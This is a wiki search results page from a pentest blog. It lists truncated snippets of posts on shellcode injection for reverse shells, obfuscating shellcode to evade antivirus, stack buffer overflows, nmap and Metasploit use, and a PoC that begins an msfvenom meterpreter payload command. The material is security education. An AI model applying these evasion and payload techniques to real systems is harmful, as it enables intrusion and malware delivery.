Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Passende Seitennamen:
Volltextergebnisse:
- Obfuscation: polymorphic in-memory decoder @en:it-security:blog
- abilities. [[en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen|In the last part]] we looked at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was recognised in memory and blocked. We now want to solve t
- Shellcode Injection Part 4 @en:it-security:blog
- y Windows Kali pentest blog english}} ====== Shellcode Injection Part 4 ====== {{it-security:blog:sc4-h... |}} In this article, we will only deal with shellcode obfuscation in passing. At this point, I wanted to develop a custom shellcode to learn more about how it works. The following ... of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ===== Preparations ===== =
- Obfuscation: ByteSwapping @en:it-security:blog
- {{tag>IT-Security Windows Kali shellcode blog english}} ====== Obfuscation: ByteSwapping ====== {{it-s... In the last post, I decrypted an encrypted shellcode in the working memory and had it executed. As enc... m into the encryption to make decrypting the shellcode a little more difficult. \\ \\ ===== Preliminary ... %%''|''%%F9%%''|''%%12%%''|''%%D1%%''| ===== The code ===== ==== Step 1: Python Encoder ==== The corr
- Shellcode Injection Part 1 @en:it-security:blog
- y windows kali pentest blog english}} ====== Shellcode Injection Part 1 ====== In this series of articles, we look at shellcode, how to inject it into processes and some techniq... In the first part, we look at how to inject shellcode from a local process. ausführt. In addition, we d... required files in the [[en:it-security:blog:shellcode_injection-1#Repository|repository]] \\ \\ ===== G
- Shellcode Injection Part 3 @en:it-security:blog
- y Windows Kali pentest blog english}} ====== Shellcode Injection Part 3 ====== {{it-security:blog:shellcode-part-3.png?400|}} Shellcode injections are generally used to initiate a reverse shell. However, in some circumstances it may be necessary to load the code for the shell in the second step. In this blog p
- Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
- ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
- Shellcode Injection Part 2 @en:it-security:blog
- y windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-security:blog:shellcode-part2.jpg?600|}} In part 1 of the shellcode injection series, we started a reverse shell from a local process. In part 2, we inject the shellcode directly into a process. This form of injection i
- Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
- ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
- Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
- blog english}} ====== Obfuscation: Disguise shellcode as UUIDs ====== {{it-security:blog:a3896ce4-2725... 00x200|}} In the last [[en:it-security:blog:shellcode_injection-4|blog post]] we dealt with the development of a calc.exe shellcode. The injection method that I used for testing was... der. I therefore had to adapt the loader and shellcode accordingly. I came up with the idea of converti
- Helpful NMAP scanner commands
- === Command Set ===== ==== Discover Hosts ==== <code bash> export IPRANGE='172.16.0.0/16' nmap -e tun0 -sn -v -oA pingscan $IPRANGE </code> ==== Parse Results ==== <code bash> grep Up pingscan.gnmap | awk '{print$2}' > 172_16_ping_ips.txt </code> ==== Discover Services ==== <code bash> nmap -
- Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
- 80568|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
- Group Managed Service Accounts
- Preparations ===== Create root key on the DC: <code powershell> Add-KdsRootKey -EffectiveImmediately </code> Then wait 10 hours to ensure that the replicati... MSA account ===== ==== Create ==== On the DC: <code powershell> New-ADServiceAccount -Name <ACCOUNTNA... llowedToRetrieveManagedPassword <COMPUTERNAME>$ </code> ==== test ==== On the target system: <code po
- Host Discovery with Metasploit database
- se and set up a user with access rights for it. <code bash> root@kali:~# msfdb init Creating database u... g/database.yml Creating initial database schema </code> ===== Metasploit: Connect database ===== <code ruby> msf6 > db_connect user:pass@127.0.0.1/db_name </code> ==== Check connection ==== <code ruby> msf6 >
- SMB Hardening
- Powershell (admin rights required) as follows: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> SMBv1 can also be deactivated via Powershell (restart required): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> === Server === The same commands apply to ser
- FatCat Attack PoC @en:it-security:blog
- rity pentest}} ====== FatCat Attack PoC ====== <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> | @orange:This PoC is for demonstration and tra... payload ==== * Start Metasploit * Open cmd <code dos>cmd</code> * Generate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterprete